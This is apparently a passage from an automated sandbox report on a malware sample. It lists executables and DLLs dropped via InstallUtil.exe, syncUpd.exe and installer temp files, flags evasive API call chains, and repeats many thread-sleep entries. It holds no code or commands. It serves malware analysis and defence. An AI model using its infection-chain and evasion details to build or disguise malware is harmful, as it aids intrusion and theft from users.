                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\libbz2-1.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\libgcc_s_dw2-1.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\TE3hLMsyayYuQeWvMvP9Nt4X.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\kMxkjYtyyi8n2ckmtmDaxJ9E.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\lznQzS1TH9pXKZRxAqzqQkL6.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_shfoldr.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-L0QM8.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\qG1eZgNFl32oR6XaByxxsti8.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\AdDlHuzgF8lFUsmxcjVFtutw.exeJump to dropped file
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso877A.tmp\INetC.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\3Vvy4C64NGc3rMim5VqOvcXj.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\u9uxsYMpS7D32QErsHuYUixB.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-JGFR0.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_shfoldr.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\zCH6Ixp4hDhbc4JHLXEIat9x.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\JqI9qtwrsBIQ597pcbH2GGod.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\libwinpthread-1.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027464559972.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\nGTzGa5UK9rAljUvktVMxS0i.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-IJOFC.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\LAuOzs2TVXyzss3wQ1slqfrw.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\13TZhjPb0HxkQlPqajCRkSnB.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\o9mWBH3W8d1Wz63VdcWUPlCt.exeJump to dropped file
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210280464513384.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\qEZDdAWnBbu94XDsWbevAW3Z.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\i7KTy1Vb7MGYU7JDB8adhZqD.exeJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128321\opera_packageJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\6Q8Wwld29CZNDuak3WcfH07i.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-AD4K7.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\H07iGpAOLsi3Xl2Zht1ZcBjf.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\wY4rC1FxrpCjj3T82kMrcxVU.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210275393811096.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\tOekaWBMtMvKgKTpn1rNSApR.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\K3GYZyKSoKi9rBsYPEMYaWx1.exeJump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128141\opera_packageJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027455829404.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-07B68.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\SgAcco9DZkNoSLENpGeXyqR0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\htMajCePjPdapCkAov1lc8J9.exeJump to dropped file
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_12-5974
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_16-3239
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI coverage: 4.9 %
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -99859s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -99750s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -99625s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -99448s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -99326s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -99212s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -99109s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -98984s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -98858s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -98744s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -98636s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -98527s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -98421s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -98312s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -98159s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -98032s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -97921s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -97806s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 7700Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 44628Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 44576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -10145709240540247s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -600000s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44328Thread sleep time: -4800000s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44660Thread sleep count: 8571 > 30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -599822s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -599671s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -599500s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -599368s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -599250s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -599140s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -599031s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -598922s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -598788s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -598667s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -598561s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -598417s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -598276s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -598136s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -598015s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -597781s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -597649s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -597527s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -597379s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -597250s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -597057s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596941s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596812s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596680s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596592s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596447s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596312s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596191s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596071s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595922s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595691s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595571s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595412s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595265s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595155s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595046s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -594907s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -594750s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -594530s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -594368s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -594191s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -593984s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -593858s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -593515s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -593312s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -593170s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -593057s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -592940s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -592816s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -592633s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -592406s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -592169s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -591953s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -591609s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -591281s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -591125s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -590906s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -590760s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -590593s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -590390s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -590109s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -589858s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -589672s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -589430s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -589156s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -588734s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -588468s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -587531s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -585843s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -585500s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -585156s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -584875s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -584684s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -584373s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -584181s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -583984s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -583788s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -583625s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -583281s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -583093s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -582906s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -582593s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -582125s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -581828s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -581515s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -581234s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -580962s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -580777s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -580553s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -580078s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -579764s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -579608s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -579418s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -579281s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -579047s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -578797s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -578406s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -578062s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -577687s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -577500s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -577218s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -576718s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -576203s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -575797s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -575390s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -574890s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -573625s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -572984s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -572172s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -571250s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -569531s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -567953s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -567406s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -566984s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -566156s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -565328s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -564625s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -563703s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -562890s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -561922s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -561281s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -560609s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -559609s >= -30000s
